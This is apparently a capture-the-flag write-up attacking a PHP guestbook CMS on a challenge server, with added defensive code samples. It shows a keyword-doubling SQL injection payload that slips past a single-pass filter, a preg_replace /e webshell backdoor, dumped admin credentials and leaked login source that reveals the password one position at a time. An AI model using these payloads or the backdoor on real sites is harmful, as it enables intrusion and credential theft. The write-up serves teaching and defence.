Challenge URL:
http://cms.nuptzj.cn
Looking at the page source:
It looks like an arbitrary file download.
Injection is possible, provided the payload avoids single quotes, double quotes and the other characters that mysql_real_escape_string escapes.
Before that, the user input is also run through a function called antiinject.
Its source can be read through the arbitrary file read vulnerability:
antiinject.php
<?php
// Single-pass keyword stripping: every keyword is removed exactly once, so a
// keyword can be rebuilt from the fragments left after a removal.
function antiinject($content){
    // The quote entries were garbled in the copy; '\'' and '"' below are a reconstruction (assumption).
    $keyword=array('select','union','and','from',' ','\'',';','"','char','or','count','master','name','pass','admin','+','-','order','=');
    $info=strtolower($content);
    // The original loop read $i<=count($keyword), an off-by-one that touches an undefined index on the last pass.
    for($i=0;$i<count($keyword);$i++){
        $info=str_replace($keyword[$i], '',$info);
    }
    return $info;
}
?>
It replaces keywords such as union/select with the empty string, but only in a single pass, so a doubled form such as seselectlect survives the filter.
So the payload is:
soid=1/**/ununionion/**/seleselectct/**/1,2,3,4/**/limit/**/1,1
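An added example, not part of this writeup or of the target CMS, that makes the defender's point concrete: a sanitizer that deletes substrings must be idempotent, and even a fixed-point version is no substitute for a prepared statement. The table and column names in fetch_post_by_id() and the $pdo connection are assumptions.

```php
<?php
// Added example: why antiinject()-style keyword stripping fails as a defence.

function antiinject_like(string $content): string {
    // Same rule as the target's filter: one pass of str_replace per keyword.
    $keyword = ['select', 'union', 'and', 'from', ' ', "'", ';', '"', 'char',
                'or', 'count', 'master', 'name', 'pass', 'admin', '+', '-',
                'order', '='];
    return str_replace($keyword, '', strtolower($content));
}

// Regression check for any sanitizer that deletes substrings: filtering its
// own output must change nothing. A non-idempotent filter lets text that was
// "removed" be reassembled from the fragments the first pass glued together.
function is_idempotent(callable $f, string $sample): bool {
    $once = $f($sample);
    return $f($once) === $once;
}

// Looping to a fixed point makes the filter idempotent, but it is still a
// blacklist: the writeup's payload never needs a space because /**/ comments
// are not on the list. A keyword list cannot enumerate the SQL grammar.
function antiinject_fixed_point(string $content): string {
    do {
        $before  = $content;
        $content = antiinject_like($content);
    } while ($content !== $before);
    return $content;
}

// The actual fix: keep user input out of the query text. With a prepared
// statement the value travels separately from the SQL, so no keyword can
// change the query's structure. Table/column names and $pdo are assumed.
function fetch_post_by_id(PDO $pdo, string $soid): ?array {
    $stmt = $pdo->prepare('SELECT * FROM filename WHERE id = :id');
    $stmt->bindValue(':id', (int) $soid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$sample = 'seleselectct';
var_dump(antiinject_like($sample));                          // one pass leaves a keyword behind
var_dump(is_idempotent('antiinject_like', $sample));
var_dump(is_idempotent('antiinject_fixed_point', $sample));
```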
Tables:
admin
username
userpass
admin, 102 117 99 107 114 117 110 116 117
filename
id
path
1,compass.php
2,arlogined.php
hackerip
message
say
nice
This yields the backend user name and password:
admin/fuckruntu
The backend URL is found here:
Reading the webshell's source shows that it is a PHP preg_replace backdoor, which can be used directly:
<?php
// $e names a callback and array_walk() invokes it as $e('|.*|e', $_POST['wtf'], '').
// With www=preg_replace that is preg_replace('|.*|e', $_POST['wtf'], ''): the
// deprecated /e modifier evaluates the replacement string as PHP. Neither
// "eval" nor "preg_replace" appears literally in the file, which is why a
// plain signature scan for webshells misses it.
$e = $_REQUEST['www'];
$arr = array($_POST['wtf'] => '|.*|e',);
array_walk($arr, $e, '');
?>
But a lot of functions appear to be disabled:
symlink
link
exec
system
escapeshellcmd
escapeshellarg
passthru
shell_exec
proc_open
proc_close
proc_terminate
proc_get_status
proc_nice
dl
pclose
popen
stream_socket_server
stream_socket_accept
stream_socket_pair
stream_wrapper_restore
mail
mb_send_mail
posix_kill
apache_child_terminate
apache_lookup_uri
apache_reset_timeout
apache_setenv
virtual
socket_create
socket_create_pair
realpath_cache_get
opcache_compile_file
opcache_get_configuration
opcache_get_status
opcache_invalidate
opcache_is_script_cached
opcache_reset
So the disabled functions have to be worked around by hand to get the flag.
Reference article:
Array
(
[0] => .
[1] => ..
[2] => about.php
[3] => antiinject.php
[4] => antixss.php
[5] => config.php
[6] => index.php
[7] => list.php
[8] => loginxlcteam
[9] => passencode.php
[10] => preview.php
[11] => say.php
[12] => sm.txt
[13] => so.php
[14] => xlcteam.php
[15] => 恭喜你获得flag2.txt
)
Array
(
[0] => .
[1] => ..
[2] => arlogined.php
[3] => conpass.php
[4] => index.php
)
Continuing with file_get_contents:
<?php
// Backend login
include './../config.php';
include './../passencode.php';
session_start();
$username=$_POST['username'];
$userpass=$_POST['userpass'];
if($username=="" || $userpass==""){
    echo "<script>alert('用户名或密码不能为空!');window.location = './index.php'</script>";
    exit();
}
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error());
mysql_select_db($db_name,$con);
$username=mysql_real_escape_string($username);
$userpass=passencode($userpass);
$result=mysql_query("SELECT * FROM admin WHERE username='$username'",$con);
// Do you know how much time I wasted writing this vulnerable password-check algorithm?! *sob*
if(mysql_num_rows($result)<=0){
    // A distinct "user does not exist" message confirms which user names are valid.
    echo "<script>alert('用户名不存在');window.location = './index.php'</script>";
    mysql_free_result($result);
    mysql_close($con);
    exit();
}
while($rs=mysql_fetch_array($result)){
    if($rs['username']==$username){
        if(strlen($userpass)!=strlen($rs['userpass'])){
            // Reveals whether the encoded password has the right length.
            echo "<script>alert('密码错误:长度不一致!');window.location = './index.php'</script>";
            mysql_free_result($result);
            mysql_close($con);
            exit();
        }
    }
    // Compares one more byte per iteration and reports the first mismatching
    // position, so the stored value can be confirmed one position at a time.
    // A full-length constant-time comparison of a hash would not leak this.
    for($i=0;$i<=strlen($userpass);++$i){
        if(strncmp($userpass,$rs['userpass'],$i)!=0){
            echo "<script>alert('密码错误:比较第 $i 位错误!');window.location = './index.php'</script>";
            break;
        }else{
            if($i==strlen($userpass)){
                $_SESSION['state']="已登录";
                // The user name and encoded password are also stored in client-side cookies.
                setcookie('username','');
                setcookie('userpass','');
                setcookie('username',"$username",time()+1200,"/");
                setcookie('userpass',"$userpass",time()+1200,"/");
                $file=mysql_query("SELECT * FROM filename where id=2");
                $path=mysql_fetch_array($file);
                echo "<script>window.location = '".$path['path']."'</script>";
                mysql_free_result($result);
                mysql_free_result($file);
                mysql_close($con);
                exit();
            }
        }
    }
    mysql_free_result($result);
    mysql_close($con);
}
?>
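An added example, not the CMS's own code, showing the login check a defender would put in place of the prefix-by-prefix strncmp() loop above: one hashed, constant-time verification and one generic failure message. It assumes $pdo is a configured PDO connection and that admin.userpass holds a password_hash() value instead of passencode() output.

```php
<?php
// Added example (not the CMS's own code): a login check without the
// length check and per-position comparison that the original reports back.
// Assumes $pdo is a configured PDO connection and that admin.userpass holds
// a password_hash() value rather than the output of passencode().

function verify_admin(PDO $pdo, string $username, string $userpass): bool {
    $stmt = $pdo->prepare('SELECT userpass FROM admin WHERE username = :u');
    $stmt->bindValue(':u', $username, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row === false) {
        // Unknown user: still pay the cost of one hash check so the response
        // time does not reveal whether the user name exists.
        static $dummy = null;
        $dummy = $dummy ?? password_hash('placeholder', PASSWORD_DEFAULT);
        password_verify($userpass, $dummy);
        return false;
    }
    // password_verify() compares the whole hash in constant time: there is no
    // length check and no "wrong at position i" to echo back to the client.
    return password_verify($userpass, $row['userpass']);
}

// One generic message for every failure; the original distinguished "user
// does not exist", "length mismatch" and "wrong at position i".
function login_message(bool $ok): string {
    return $ok ? 'Welcome' : 'Invalid user name or password';
}

// When an account is created or a password changed, store the hash, never
// the password itself or a reversible encoding of it (and never in a cookie).
function store_admin_password(PDO $pdo, string $username, string $newpass): void {
    $stmt = $pdo->prepare('UPDATE admin SET userpass = :h WHERE username = :u');
    $stmt->bindValue(':h', password_hash($newpass, PASSWORD_DEFAULT), PDO::PARAM_STR);
    $stmt->bindValue(':u', $username, PDO::PARAM_STR);
    $stmt->execute();
}
```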
<?php
session_start();
// Only the session flag set by the login script is checked here.
if(!isset($_SESSION['state'])){
    echo "<script>alert('请先登陆!');window.location = './index.php'</script>";
    exit();
}else{
    if($_SESSION['state']!="已登录"){
        echo "<script>alert('请先登陆!');window.location = './index.php'</script>";
        exit();
    }
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Xlcteam留言板系统后台</title>
</head>
<body>
<center>
<h1>恭喜你已拿下后台,离爆菊只差一步了flag1:nctf{}</h1>
<p> </p>
<hr />
<h3>能来到这里,相信也不是只会用工具的脚本小子了</h3>
<h3>现在离爆菊只差一步了</h3>
<hr />
<h3>因为程序猿连后台都懒得开发了,为了方便管理,他邪恶地放了一个一句话木马在网站的根目录下<br />
小马的文件名为:xlcteam.php
<?php /*
include './../config.php';
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error());
mysql_select_db($db_name,$con);
mysql_query("set names gb2312");
$file=mysql_query("SELECT * FROM filename where id=3");
$filename=mysql_fetch_array($file);
echo $filename['name'];*/
?>
</h3>
<hr />
<h4>黑阔,哎哟~不错哦
</h4>
</center>
</body>
</html>